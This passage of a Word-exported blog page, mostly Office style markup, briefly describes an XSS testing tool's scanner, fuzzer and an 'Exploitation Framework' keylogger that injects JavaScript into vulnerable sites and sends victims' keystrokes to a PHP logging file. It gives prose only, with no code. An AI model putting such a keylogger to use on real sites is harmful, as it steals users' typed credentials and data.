  &lt;w:LsdException Locked="false" Priority="32" SemiHidden="false"
   UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/&gt;
  &lt;w:LsdException Locked="false" Priority="33" SemiHidden="false"
   UnhideWhenUsed="false" QFormat="true" Name="Book Title"/&gt;
  &lt;w:LsdException Locked="false" Priority="37" Name="Bibliography"/&gt;
  &lt;w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/&gt;
 &lt;/w:LatentStyles&gt;
&lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 10]&gt;
&lt;style&gt;
 /* Style Definitions */
 table.MsoNormalTable
 {mso-style-name:"Table Normal";
 mso-tstyle-rowband-size:0;
 mso-tstyle-colband-size:0;
 mso-style-noshow:yes;
 mso-style-priority:99;
 mso-style-qformat:yes;
 mso-style-parent:"";
 mso-padding-alt:0in 5.4pt 0in 5.4pt;
 mso-para-margin-top:0in;
 mso-para-margin-right:0in;
 mso-para-margin-bottom:8.0pt;
 mso-para-margin-left:0in;
 line-height:107%;
 mso-pagination:widow-orphan;
 font-size:11.0pt;
 font-family:"Calibri","sans-serif";
 mso-ascii-font-family:Calibri;
 mso-ascii-theme-font:minor-latin;
 mso-hansi-font-family:Calibri;
 mso-hansi-theme-font:minor-latin;
 mso-bidi-font-family:"Times New Roman";
 mso-bidi-theme-font:minor-bidi;}
&lt;/style&gt;
&lt;![endif]--&gt;

&lt;br /&gt;
&lt;div class="MsoNormal"&gt;
&lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;span style="font-size: 14.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"&gt;[VIDEO] &lt;/span&gt;&lt;/b&gt;&lt;a href="https://www.youtube.com/watch?v=CJEgO4_kd-8"&gt;&lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;span style="font-size: 14.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"&gt;https://www.youtube.com/watch?v=CJEgO4_kd-8&lt;/span&gt;&lt;/b&gt;&lt;/a&gt;&lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;span style="font-size: 14.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"&gt;
[/VIDEO]&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="MsoNormal"&gt;
&lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;span style="font-size: 14.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"&gt; &lt;/span&gt;&lt;/b&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;h4&gt;
&lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;span style="font-size: 14.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"&gt;XSS Multi-Parameter Scanner&lt;/span&gt;&lt;/b&gt;&lt;/h4&gt;
&lt;/div&gt;
&lt;br /&gt;
&lt;div class="MsoNormal"&gt;
&lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;span style="font-size: 14.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"&gt; &lt;/span&gt;&lt;/b&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;a href="http://i47.tinypic.com/15wjkau.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://i47.tinypic.com/15wjkau.png" height="160" width="400" /&gt;&lt;/a&gt;&lt;/b&gt;&lt;/div&gt;
&lt;b style="mso-bidi-font-weight: normal;"&gt;&amp;nbsp;

&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div class="MsoNormal"&gt;
&lt;span style="font-size: 12.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"&gt;The
Multi-Parameter XSS Scanner comes when you have multiple parameter to test for
XSS. It can extract the different parameters from the given URL and test them
individually. It saves a lot of your time as you don’t need to test each
parameters separately.&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;h4&gt;
&lt;span style="font-size: 12.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"&gt;&lt;span style="font-size: 12.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"&gt;&lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;span style="font-size: 14.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"&gt;XSS Fuzzer&lt;/span&gt;&lt;/b&gt;&lt;/span&gt; &lt;/span&gt;&lt;/h4&gt;
&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;span style="font-size: 12.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://oi47.tinypic.com/no8pdf.jpg" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://oi47.tinypic.com/no8pdf.jpg" height="107" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;span style="font-size: 12.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"&gt;

&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;span style="font-size: 14.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&amp;nbsp;

&lt;i style="mso-bidi-font-style: normal;"&gt;&lt;span style="font-size: 9.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/i&gt;&lt;br /&gt;
&lt;span style="font-size: 12.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"&gt;&amp;nbsp;

&lt;/span&gt;&lt;br /&gt;
&lt;div class="MsoNormal"&gt;
&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 12.0pt; line-height: 115%; mso-ansi-language: EN-US; mso-ascii-theme-font: minor-latin; mso-bidi-font-size: 11.0pt; mso-bidi-language: AR-SA; mso-bidi-theme-font: minor-latin; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;"&gt;The XSS Fuzzer is a convenient module to detect
hidden XSS as well as other vulnerabilities like HTTP Parameter Polution. With
the Fuzzer, one can conduct an out of the box testing of the box fuzzing to
detect hidden vulnerabilities in a web application. &lt;/span&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;h4 class="MsoNormal"&gt;
&lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;span style="font-size: 18.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"&gt;2. Exploitation Framework&lt;/span&gt;&lt;/b&gt;&lt;/h4&gt;
&lt;h4 class="MsoNormal"&gt;
&lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;span style="font-size: 14.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"&gt;XSS Keylogger&lt;/span&gt;&lt;/b&gt;&lt;/h4&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://oi45.tinypic.com/28upute.jpg" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://oi45.tinypic.com/28upute.jpg" height="197" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="MsoNormal"&gt;
&lt;span style="font-size: 12.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"&gt;The
tool includes an inbuilt victim side Key logger which is implemented using
JavaScript and PHP.&lt;span style="mso-spacerun: yes;"&gt;&amp;nbsp; &lt;/span&gt;PHP is served with
the help of a portable PHP server named QuickPHP by Zach Saw. A JavaScript file
is injected into the web application vulnerable to XSS and is presented to the
victim. The script captures the keystrokes made by the victim and send to a PHP
file which further write down the logs into a text file. &lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;span style="font-size: 14.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;
 &lt;o:OfficeDocumentSettings&gt;
  &lt;o:RelyOnVML/&gt;
  &lt;o:AllowPNG/&gt;
 &lt;/o:OfficeDocumentSettings&gt;
&lt;/xml&gt;&lt;![endif]--&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;span style="font-size: 14.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;
 &lt;w:WordDocument&gt;
  &lt;w:View&gt;Normal&lt;/w:View&gt;
  &lt;w:Zoom&gt;0&lt;/w:Zoom&gt;
  &lt;w:TrackMoves/&gt;
  &lt;w:TrackFormatting/&gt;
  &lt;w:PunctuationKerning/&gt;
  &lt;w:ValidateAgainstSchemas/&gt;
  &lt;w:SaveIfXMLInvalid&gt;false&lt;/w:SaveIfXMLInvalid&gt;
  &lt;w:IgnoreMixedContent&gt;false&lt;/w:IgnoreMixedContent&gt;
  &lt;w:AlwaysShowPlaceholderText&gt;false&lt;/w:AlwaysShowPlaceholderText&gt;
  &lt;w:DoNotPromoteQF/&gt;
  &lt;w:LidThemeOther&gt;EN-US&lt;/w:LidThemeOther&gt;
  &lt;w:LidThemeAsian&gt;X-NONE&lt;/w:LidThemeAsian&gt;
  &lt;w:LidThemeComplexScript&gt;X-NONE&lt;/w:LidThemeComplexScript&gt;
  &lt;w:Compatibility&gt;
   &lt;w:BreakWrappedTables/&gt;
   &lt;w:SnapToGridInCell/&gt;
   &lt;w:WrapTextWithPunct/&gt;
   &lt;w:UseAsianBreakRules/&gt;
   &lt;w:DontGrowAutofit/&gt;
   &lt;w:SplitPgBreakAndParaMark/&gt;
   &lt;w:DontVertAlignCellWithSp/&gt;
   &lt;w:DontBreakConstrainedForcedTables/&gt;
   &lt;w:DontVertAlignInTxbx/&gt;
   &lt;w:Word11KerningPairs/&gt;
   &lt;w:CachedColBalance/&gt;
  &lt;/w:Compatibility&gt;
  &lt;m:mathPr&gt;
   &lt;m:mathFont m:val="Cambria Math"/&gt;
   &lt;m:brkBin m:val="before"/&gt;
   &lt;m:brkBinSub m:val="--"/&gt;
   &lt;m:smallFrac m:val="off"/&gt;
   &lt;m:dispDef/&gt;
   &lt;m:lMargin m:val="0"/&gt;
   &lt;m:rMargin m:val="0"/&gt;
   &lt;m:defJc m:val="centerGroup"/&gt;
   &lt;m:wrapIndent m:val="1440"/&gt;
   &lt;m:intLim m:val="subSup"/&gt;
   &lt;m:naryLim m:val="undOvr"/&gt;
  &lt;/m:mathPr&gt;&lt;/w:WordDocument&gt;
&lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;
 &lt;w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"
  DefSemiHidden="true" DefQFormat="false" DefPriority="99"
  LatentStyleCount="267"&gt;
  &lt;w:LsdException Locked="false" Priority="0" SemiHidden="false"
   UnhideWhenUsed="false" QFormat="true" Name="Normal"/&gt;
  &lt;w:LsdException Locked="false" Priority="9" SemiHidden="false"
   UnhideWhenUsed="false" QFormat="true" Name="heading 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4"/&gt;
  &lt;w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5"/&gt;
  &lt;w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6"/&gt;
  &lt;w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7"/&gt;
  &lt;w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8"/&gt;
  &lt;w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9"/&gt;
  &lt;w:LsdException Locked="false" Priority="39" Name="toc 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="39" Name="toc 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="39" Name="toc 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="39" Name="toc 4"/&gt;
  &lt;w:LsdException Locked="false" Priority="39" Name="toc 5"/&gt;
  &lt;w:LsdException Locked="false" Priority="39" Name="toc 6"/&gt;
  &lt;w:LsdException Locked="false" Priority="39" Name="toc 7"/&gt;
  &lt;w:LsdException Locked="false" Priority="39" Name="toc 8"/&gt;
  &lt;w:LsdException Locked="false" Priority="39" Name="toc 9"/&gt;
  &lt;w:LsdException Locked="false" Priority="35" QFormat="true" Name="caption"/&gt;
  &lt;w:LsdException Locked="false" Priority="10" SemiHidden="false"
   UnhideWhenUsed="false" QFormat="true" Name="Title"/&gt;
  &lt;w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font"/&gt;
  &lt;w:LsdException Locked="false" Priority="11" SemiHidden="false"
   UnhideWhenUsed="false" QFormat="true" Name="Subtitle"/&gt;
  &lt;w:LsdException Locked="false" Priority="22" SemiHidden="false"
   UnhideWhenUsed="false" QFormat="true" Name="Strong"/&gt;
  &lt;w:LsdException Locked="false" Priority="20" SemiHidden="false"
   UnhideWhenUsed="false" QFormat="true" Name="Emphasis"/&gt;
  &lt;w:LsdException Locked="false" Priority="59" SemiHidden="false"
   UnhideWhenUsed="false" Name="Table Grid"/&gt;
  &lt;w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text"/&gt;
  &lt;w:LsdException Locked="false" Priority="1" SemiHidden="false"
   UnhideWhenUsed="false" QFormat="true" Name="No Spacing"/&gt;
  &lt;w:LsdException Locked="false" Priority="60" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light Shading"/&gt;
  &lt;w:LsdException Locked="false" Priority="61" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light List"/&gt;
  &lt;w:LsdException Locked="false" Priority="62" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light Grid"/&gt;
  &lt;w:LsdException Locked="false" Priority="63" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Shading 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="64" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Shading 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="65" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium List 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="66" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium List 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="67" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="68" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="69" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="70" SemiHidden="false"
   UnhideWhenUsed="false" Name="Dark List"/&gt;
  &lt;w:LsdException Locked="false" Priority="71" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful Shading"/&gt;
  &lt;w:LsdException Locked="false" Priority="72" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful List"/&gt;
  &lt;w:LsdException Locked="false" Priority="73" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful Grid"/&gt;
  &lt;w:LsdException Locked="false" Priority="60" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light Shading Accent 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="61" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light List Accent 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="62" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light Grid Accent 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="63" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="64" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="65" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium List 1 Accent 1"/&gt;
  &lt;w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision"/&gt;
  &lt;w:LsdException Locked="false" Priority="34" SemiHidden="false"
   UnhideWhenUsed="false" QFormat="true" Name="List Paragraph"/&gt;
  &lt;w:LsdException Locked="false" Priority="29" SemiHidden="false"
   UnhideWhenUsed="false" QFormat="true" Name="Quote"/&gt;
  &lt;w:LsdException Locked="false" Priority="30" SemiHidden="false"
   UnhideWhenUsed="false" QFormat="true" Name="Intense Quote"/&gt;
  &lt;w:LsdException Locked="false" Priority="66" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium List 2 Accent 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="67" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="68" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="69" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="70" SemiHidden="false"
   UnhideWhenUsed="false" Name="Dark List Accent 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="71" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful Shading Accent 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="72" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful List Accent 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="73" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful Grid Accent 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="60" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light Shading Accent 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="61" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light List Accent 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="62" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light Grid Accent 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="63" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="64" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="65" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium List 1 Accent 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="66" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium List 2 Accent 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="67" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="68" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="69" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="70" SemiHidden="false"
   UnhideWhenUsed="false" Name="Dark List Accent 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="71" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful Shading Accent 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="72" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful List Accent 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="73" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful Grid Accent 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="60" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light Shading Accent 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="61" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light List Accent 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="62" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light Grid Accent 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="63" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="64" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="65" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium List 1 Accent 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="66" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium List 2 Accent 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="67" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="68" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="69" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="70" SemiHidden="false"
   UnhideWhenUsed="false" Name="Dark List Accent 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="71" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful Shading Accent 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="72" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful List Accent 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="73" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful Grid Accent 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="60" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light Shading Accent 4"/&gt;
  &lt;w:LsdException Locked="false" Priority="61" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light List Accent 4"/&gt;
  &lt;w:LsdException Locked="false" Priority="62" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light Grid Accent 4"/&gt;
  &lt;w:LsdException Locked="false" Priority="63" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4"/&gt;
  &lt;w:LsdException Locked="false" Priority="64" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4"/&gt;
  &lt;w:LsdException Locked="false" Priority="65" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium List 1 Accent 4"/&gt;
  &lt;w:LsdException Locked="false" Priority="66" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium List 2 Accent 4"/&gt;
  &lt;w:LsdException Locked="false" Priority="67" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4"/&gt;
  &lt;w:LsdException Locked="false" Priority="68" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4"/&gt;
  &lt;w:LsdException Locked="false" Priority="69" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4"/&gt;
  &lt;w:LsdException Locked="false" Priority="70" SemiHidden="false"
   UnhideWhenUsed="false" Name="Dark List Accent 4"/&gt;
  &lt;w:LsdException Locked="false" Priority="71" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful Shading Accent 4"/&gt;
  &lt;w:LsdException Locked="false" Priority="72" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful List Accent 4"/&gt;
  &lt;w:LsdException Locked="false" Priority="73" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful Grid Accent 4"/&gt;
  &lt;w:LsdException Locked="false" Priority="60" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light Shading Accent 5"/&gt;
  &lt;w:LsdException Locked="false" Priority="61" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light List Accent 5"/&gt;
  &lt;w:LsdException Locked="false" Priority="62" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light Grid Accent 5"/&gt;
  &lt;w:LsdException Locked="false" Priority="63" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5"/&gt;
  &lt;w:LsdException Locked="false" Priority="64" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5"/&gt;
  &lt;w:LsdException Locked="false" Priority="65" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium List 1 Accent 5"/&gt;
  &lt;w:LsdException Locked="false" Priority="66" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium List 2 Accent 5"/&gt;
  &lt;w:LsdException Locked="false" Priority="67" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5"/&gt;
  &lt;w:LsdException Locked="false" Priority="68" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5"/&gt;
  &lt;w:LsdException Locked="false" Priority="69" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5"/&gt;
  &lt;w:LsdException Locked="false" Priority="70" SemiHidden="false"
   UnhideWhenUsed="false" Name="Dark List Accent 5"/&gt;
  &lt;w:LsdException Locked="false" Priority="71" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/&gt;
  &lt;w:LsdException Locked="false" Priority="72" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful List Accent 5"/&gt;
  &lt;w:LsdException Locked="false" Priority="73" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/&gt;
  &lt;w:LsdException Locked="false" Priority="60" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light Shading Accent 6"/&gt;
  &lt;w:LsdException Locked="false" Priority="61" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light List Accent 6"/&gt;
  &lt;w:LsdException Locked="false" Priority="62" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light Grid Accent 6"/&gt;
  &lt;w:LsdException Locked="false" Priority="63" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/&gt;
  &lt;w:LsdException Locked="false" Priority="64" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/&gt;
  &lt;w:LsdException Locked="false" Priority="65" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/&gt;
  &lt;w:LsdException Locked="false" Priority="66" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/&gt;
  &lt;w:LsdException Locked="false" Priority="67" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/&gt;
  &lt;w:LsdException Locked="false" Priority="68" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/&gt;
  &lt;w:LsdException Locked="false" Priority="69" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/&gt;
  &lt;w:LsdException Locked="false" Priority="70" SemiHidden="false"
   UnhideWhenUsed="false" Name="Dark List Accent 6"/&gt;
  &lt;w:LsdException Locked="false" Priority="71" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/&gt;
  &lt;w:LsdException Locked="false" Priority="72" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful List Accent 6"/&gt;
  &lt;w:LsdException Locked="false" Priority="73" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/&gt;
  &lt;w:LsdException Locked="false" Priority="19" SemiHidden="false"
   UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/&gt;
  &lt;w:LsdException Locked="false" Priority="21" SemiHidden="false"
   UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/&gt;
  &lt;w:LsdException Locked="false" Priority="31" SemiHidden="false"
   UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/&gt;
